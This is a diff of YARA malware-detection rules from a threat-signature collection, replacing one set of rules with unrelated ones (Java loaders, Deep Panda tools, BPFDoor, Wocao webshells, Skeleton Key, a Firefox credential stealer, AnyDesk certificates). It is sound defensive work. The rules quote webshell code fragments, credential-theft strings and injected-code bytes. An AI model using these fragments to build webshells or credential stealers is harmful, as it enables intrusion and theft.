 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7c5999082d9c5f3dd342ca05191311ddd1e24ba7675d1e9763fb4d962be3a933"
-		logic_hash = "fc8e72dbc6133ca27cfd35bb952c32be3a75d0485558915f9ea49fc8fd8c5719"
-		score = 60
+		logic_hash = "e70c15ef10b63a011edbcedc773a8e2917fd915c3ecc273c3bf2b78eb10fc570"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a0 = "<Task version=" wide
-		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" wide
-		$sa1 = "java.exe</Command>" wide
-		$sa2 = "javaw.exe</Command>" wide
-		$sb1 = "<Arguments>-jar " wide
+		$a = "String strLogo = request.getParameter(\"image\")"
+		$b = "!strLogo.equals(\"web.gif\")"
+		$c = "<font color=red>Save Failed!</font>"
+		$d = "<font color=red>Save Success!</font>"
+		$e = "Save path:<br><input type=text"
+		$f = "if (newfile.exists() && newfile.length()>0) { out.println"
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 500KB and all of ( $a* ) and 1 of ( $sa* ) and 1 of ( $sb* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_JAVA_Loader_Indicators_Aug25 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Index_Jsp
 {
 	meta:
-		description = "Detects indicators of a Java loader used in phishing campaigns"
-		author = "Florian Roth"
-		id = "e0b386ff-aea3-5311-8d0e-e97b6e64e340"
-		date = "2025-08-07"
-		modified = "2025-08-08"
-		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L25-L43"
+		description = "Strings from the index.jsp socket tunnel"
+		author = "Fox-IT SRT"
+		id = "9c226ccd-6c69-523c-bca4-371e55274667"
+		date = "2019-12-20"
+		modified = "2023-12-05"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L337-L353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac610cd6d3030f49058d5e6f059b746cf3da05ca3cdc8f2be2f5f1cfec2ff665"
-		score = 70
+		logic_hash = "870dad9fb5456f8edbd9f3c2d0b8764cf1143399626ce4df53c93919bcb1a0cb"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c4cf746fce283878dde567e5457a8ebdbb7ff3414be46569ecdd57338bd96fa1"
+		tags = ""
 
 	strings:
-		$s1 = "Loader.classPK" ascii fullword
-		$s2 = "stubPK" ascii
-		$s3 = "META-INF/MANIFEST.MFPK" ascii
+		$x1 = "X-CMD"
+		$x2 = "X-STATUS"
+		$x3 = "X-TARGET"
+		$x4 = "X-ERROR"
+		$a = "out.print(\"All seems fine.\");"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 500KB and $s1 in ( filesize - 224 .. filesize ) and $s2 in ( filesize - 224 .. filesize ) and $s3 in ( filesize - 224 .. filesize )
+		all of ( $x* ) and $a
 }
-rule SIGNATURE_BASE_MAL_JAVA_Loader_Final_Jar_Aug25
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Ver_Jsp
 {
 	meta:
-		description = "Detects a final Java loader JAR file used in phishing campaigns"
-		author = "Florian Roth"
-		id = "ae4202a5-89ab-54d2-ac96-f98d338b96ba"
-		date = "2025-08-07"
-		modified = "2025-08-08"
-		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L45-L60"
+		description = "Strings from the ver.jsp webshell"
+		author = "Fox-IT SRT"
+		id = "b2828b84-8934-5111-9345-683a07025070"
+		date = "2019-12-20"
+		modified = "2023-12-05"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L355-L372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "743e7e12afd949aacbbfcfc62b13d4e65b7011ca4301b37b71bc8032f96aff20"
-		score = 85
+		logic_hash = "ada6de4b07a76e79bb17793cda2b51f96554a35992a73f59c360487638ae3be3"
+		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "0a7fddd91b332c8daee2c0727b884fc92cfaede02883dbad75f7efc299e884e3"
 
 	strings:
-		$s1 = "Obfuscation by Allatori Obfuscator" ascii fullword
-		$s2 = "MANIFEST.MFM" ascii fullword
-		$s3 = "GetCpu.classPK" ascii fullword
-		$s4 = "extra/spreader" ascii fullword
+		$a = "String strLogo = request.getParameter(\"id\")"
+		$b = "!strLogo.equals(\"256\")"
+		$c = "boolean chkos = msg.startsWith"
+		$d = "while((c = er.read()) != -1)"
+		$e = "out.print((char)c);}in.close()"
+		$f = "out.print((char)c);}er.close()"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_JAVA_Class_Allatori_Obfuscator_Aug25 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Webinfo
 {
 	meta:
-		description = "Detects a relatively small Java class file obfuscated by Allatori Obfuscator"
-		author = "Florian Roth"
-		id = "30c90de5-dcd7-5cf3-8116-ff6f384c2ebc"
-		date = "2025-08-07"
-		modified = "2025-08-08"
-		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L62-L76"
+		description = "Generic strings from webinfo.war webshells"
+		author = "Fox-IT SRT"
+		id = "b8477f62-f3f6-5526-b0e3-9b794fefaa1f"
+		date = "2019-12-20"
+		modified = "2023-12-05"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L374-L394"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "981ae619526e3f90618884d133d565630320419ad4b9c75737708c864fac8365"
-		score = 50
+		logic_hash = "711737a56067f24f422cc7d5aeba4389741fe18a0e66f2715fce626c3b6aef19"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "0a7fddd91b332c8daee2c0727b884fc92cfaede02883dbad75f7efc299e884e3"
+		tags = ""
 
 	strings:
-		$x1 = "Obfuscation by Allatori Obfuscator" ascii fullword
+		$var1 = "String strLogo = request.getParameter"
+		$var2 = "String content = request.getParameter(\"content\");"
+		$var3 = "String basePath=request.getScheme()"
+		$var4 = "!strLogo.equals("
+		$var5 = "if(path!=null && !path.equals(\"\") && content!=null"
+		$var6 = "File newfile=new File(path);"
+		$str1 = "Save Success!"
+		$str2 = "Save Failed!"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 500KB and $x1
+		2 of ( $var* ) or ( all of ( $str* ) and 1 of ( $var* ) )
 }
-rule SIGNATURE_BASE_Deeppanda_Sl_Txt_Packed
+rule SIGNATURE_BASE_Mal_Dropper_Httpexe_From_CAB : FILE
 {
 	meta:
-		description = "Hack Deep Panda - ScanLine sl-txt-packed"
+		description = "Detects a dropper from a CAB file mentioned in the article"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a335810-2bf9-5a0b-bef4-1bade65a0f00"
-		date = "2015-02-08"
+		id = "f67c13e9-67e7-56aa-8ced-55e9bb814971"
+		date = "2016-05-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L3-L22"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L10-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
-		logic_hash = "37f875dcb2c920278c2625085c97a9dcce1907198409595a10e6a3fbce767f35"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "d114a3ab348bba49a78852b87b712908bc974bf35a2b841099a232e761cad8f2"
+		score = 60
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
 
 	strings:
-		$s0 = "Command line port scanner" fullword wide
-		$s1 = "sl.exe" fullword wide
-		$s2 = "CPports.txt" fullword ascii
-		$s3 = ",GET / HTTP/.}" fullword ascii
-		$s4 = "Foundstone Inc." fullword wide
-		$s9 = " 2002 Foundstone Inc." fullword wide
-		$s15 = ", Inc. 2002" fullword ascii
-		$s20 = "ICMP Time" fullword ascii
+		$s1 = "029.Hdl" fullword ascii
+		$s2 = "http.exe" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_Deeppanda_Lot1
+rule SIGNATURE_BASE_Mal_Http_EXE : FILE
 {
 	meta:
-		description = "Hack Deep Panda - lot1.tmp-pwdump"
+		description = "Detects trojan from APT report named http.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c72120a5-8637-580c-9856-e070dfb6df94"
-		date = "2015-02-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L24-L49"
+		id = "bcae9920-56ea-54a1-857b-70c275090e19"
+		date = "2016-05-25"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L27-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
-		logic_hash = "92169a1288f30dc6008e1a8c9b2b700f878c90aa09634e36fea586e19657dbd1"
-		score = 75
+		logic_hash = "0e28b64bbfd2b6d40f4bd82373624d22df3d5c45c22d7155747f0ff33976207d"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
 
 	strings:
-		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
-		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
-		$s2 = "Target: Failed to load SAM functions." fullword ascii
-		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
-		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
-		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
-		$s12 = "PwDump.exe" fullword ascii
-		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
-		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
-		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
-		$s16 = "dump logon session" fullword ascii
-		$s17 = "Timed out waiting to get our pipe back" fullword ascii
-		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
-		$s20 = "%s\\%s.exe" fullword ascii
+		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
+		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
+		$x3 = "\\dumps.dat" ascii
+		$x4 = "\\wordpade.exe" ascii
+		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
+		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
+		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
+		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii
+		$s1 = "SELECT * FROM moz_logins;" fullword ascii
+		$s2 = "makescr.dat" fullword ascii
+		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
+		$s4 = "?moz-proxy://" ascii
+		$s5 = "[%s-%s] Title: %s" fullword ascii
+		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
+		$s7 = "Windows 95 SR2" fullword ascii
+		$s8 = "\\|%s|0|0|" ascii
 
 	condition:
-		10 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 2 of ( $s* ) ) ) or ( 3 of ( $x* ) )
 }
-rule SIGNATURE_BASE_Deeppanda_Htran_Exe
+rule SIGNATURE_BASE_Mal_Potplayer_DLL : FILE
 {
 	meta:
-		description = "Hack Deep Panda - htran-exe"
+		description = "Detects a malicious PotPlayer.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2a551e82-aff1-5a77-bc5e-d06e49dca8bc"
-		date = "2015-02-08"
+		id = "71d34266-63e0-5a97-9a80-952be917641a"
+		date = "2016-05-25"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L51-L70"
+		reference = "https://goo.gl/13Wgy1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_danti_svcmondr.yar#L60-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
-		logic_hash = "9ac5ddc53d3d5292acb3dcf68e66bc3f6ab4b8e61a71597dd84454adc516f95d"
-		score = 75
+		logic_hash = "1d1b68fa8de2e4ddfa71cbcd5e166181370172cc8a3167ade2da393e4f7998f1"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
 
 	strings:
-		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s2 = "\\Release\\htran.pdb" ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s8 = "======================== htran V%s =======================" fullword ascii
-		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
+		$s3 = "PotPlayer.dll" fullword ascii
+		$s4 = "\\update.dat" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or all of ( $s* )
 }
-rule SIGNATURE_BASE_Deeppanda_Trojan_Kakfum
+rule SIGNATURE_BASE_Skeleton_Key_Patcher
 {
 	meta:
-		description = "Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a204f9cb-65f8-53ea-a4eb-d89112942073"
-		date = "2015-02-08"
+		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		id = "a2805cce-7605-58a4-85ce-9dff5586858e"
+		date = "2015-01-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L72-L90"
+		reference = "http://goo.gl/aAk3lN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_skeletonkey.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0710edea973dce6f5feccf2e7e508cd5f65aa451e0bb5aca503778ffe2363401"
-		score = 75
-		quality = 60
+		logic_hash = "451b77152e38a120bd8d8a832f0f7c003974113ead18aabfe043a332fb1f484c"
+		score = 70
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
-		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
 
 	strings:
-		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
-		$s1 = "%s\\sqlsrv32.dll" fullword ascii
-		$s2 = "%s\\sqlsrv64.dll" fullword ascii
-		$s3 = "%s\\%d.tmp" fullword ascii
-		$s4 = "ServiceMaix" fullword ascii
-		$s15 = "sqlserver" fullword ascii
+		$target_process = "lsass.exe" wide
+		$dll1 = "cryptdll.dll"
+		$dll2 = "samsrv.dll"
+		$name = "HookDC.dll"
+		$patched1 = "CDLocateCSystem"
+		$patched2 = "SamIRetrievePrimaryCredentials"
+		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Redmenshen_Bpfdoor_May23_1 : FILE
+rule SIGNATURE_BASE_Skeleton_Key_Injected_Code
 {
 	meta:
-		description = "Detects BPFDoor malware"
-		author = "Florian Roth"
-		id = "25df4dba-ec6e-5999-b6be-56fe933cb0d0"
-		date = "2023-05-11"
+		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		id = "29daaffa-cd9d-55d3-b79d-cde1c76e9e45"
+		date = "2015-01-13"
 		modified = "2023-12-05"
-		reference = "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L3-L42"
+		reference = "http://goo.gl/aAk3lN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_skeletonkey.yar#L26-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c58971a43443800256e791b4f9fe7c3221518b0050e5f2964b6c843ddb4549ac"
-		score = 80
+		logic_hash = "e87cb9a49d0df6f75ca1ae51f8255ea476b699e82d525d7eca06bfda3462d84b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "afa8a32ec29a31f152ba20a30eb483520fe50f2dce6c9aa9135d88f7c9c511d7"
+		tags = ""
 
 	strings:
-		$x1 = "[-] Execute command failed" ascii fullword
-		$x2 = "/var/run/initd.lock" ascii fullword
-		$xc1 = { 2F 00 3E 3E 00 65 78 69 74 00 72 00 }
-		$sc1 = { 9F CD 30 44 }
-		$sc2 = { 66 27 14 5E }
-		$sa1 = "TLS-CHACHA20-POLY1305-SHA256" ascii fullword
-		$sop1 = { 48 83 c0 01 4c 39 f8 75 ea 4c 89 7c 24 68 48 69 c3 d0 00 00 00 48 8b 5c 24 50 48 8b 54 24 78 48 c7 44 24 38 00 00 00 00 }
-		$sop2 = { 48 89 de f3 a5 89 03 8b 44 24 2c 39 44 24 28 44 89 4b 04 48 89 53 10 0f 95 c0 }
-		$sop3 = { 49 d3 cd 4d 31 cd b1 29 49 89 e9 49 d3 c8 4d 31 c5 4c 03 68 10 48 89 f9 }
+		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+		$patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 900KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of them or ( all of ( $sc* ) and $sc1 in ( @sc2 [ 1 ] -50 .. @sc2 [ 1 ] + 50 ) ) ) or ( 2 of ( $x* ) or 5 of them )
+		any of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_1 : FILE
+
+rule SIGNATURE_BASE_PUA_Anydesk_Compromised_Certificate_Revoked_Jan24 : FILE
 {
 	meta:
-		description = "Detects unknown Linux implants (uploads from KR and MO)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1438c3bf-3c42-59d5-9f3f-2d72bdaaac42"
-		date = "2022-05-05"
-		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L45-L76"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8) after it was revoked. This is not a threat detection. It detects an outdated version of AnyDesk that was signed with a certificate that has been revoked."
+		author = "Florian Roth"
+		id = "eeefc9a5-1416-544b-b95e-c063000a4028"
+		date = "2024-02-05"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8de10beea4ef2e059b16d38fb015d6f091cc517b6f0c06b6ef6868518349994d"
-		score = 90
+		logic_hash = "a1f148dbf15579bd6a65e7c93fa64f00ea481d6b314a444fa924a4604adb9a6d"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
-		hash2 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
-		hash3 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
-		hash4 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
-		hash5 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
-		hash6 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
-		hash7 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
-		hash8 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
-		hash9 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
-		hash10 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
-
-	strings:
-		$s1 = "[-] Connect failed." ascii fullword
-		$s2 = "export MYSQL_HISTFILE=" ascii fullword
-		$s3 = "udpcmd" ascii fullword
-		$s4 = "getshell" ascii fullword
-		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
-		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
-		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
-		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 80KB and 2 of them or 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" and pe.signatures [ i ] . serial == "0d:bf:15:2d:ea:f0:b9:81:a8:a9:38:d5:3f:76:9d:b8" )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_2 : FILE
+
+rule SIGNATURE_BASE_SUSP_Anydesk_Compromised_Certificate_Jan24_1 : FILE
 {
 	meta:
-		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5c3d530-ed6f-563e-a3b0-55d4c82e4899"
-		date = "2022-05-07"
-		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_implant_may22.yar#L78-L100"
+		description = "Detects binaries signed with a compromised signing certificate of AnyDesk that aren't AnyDesk itself (philandro Software GmbH, 0DBF152DEAF0B981A8A938D53F769DB8; strict version)"
+		author = "Florian Roth"
+		id = "8d172b04-f7f7-54df-b30c-3ee17d3cca12"
+		date = "2024-02-02"
+		modified = "2024-04-24"
+		reference = "https://anydesk.com/en/public-statement"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anydesk_compromised_cert_feb23.yar#L19-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7525c675dbba6eb480f1d28fc6db05bd9907725c291e64ee6dc2453fd42892a0"
-		score = 85
+		logic_hash = "1b2268b1efa09ee8578f4c1ae07617ac6bebeacd3ed50598a2fc2ec4d709baa7"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
-		hash2 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
-		hash3 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
-		hash4 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
 
 	strings:
-		$opx1 = { 48 83 c0 0c 48 8b 95 e8 fe ff ff 48 83 c2 0c 8b 0a 8b 55 f0 01 ca 89 10 c9 }
-		$opx2 = { 48 01 45 e0 83 45 f4 01 8b 45 f4 3b 45 dc 7c cd c7 45 f4 00 00 00 00 eb 2? 48 8b 05 ?? ?? 20 00 }
-		$op1 = { 48 8d 14 c5 00 00 00 00 48 8b 45 d0 48 01 d0 48 8b 00 48 89 c7 e8 ?? ?? ff ff 48 83 c0 01 48 01 45 e0 }
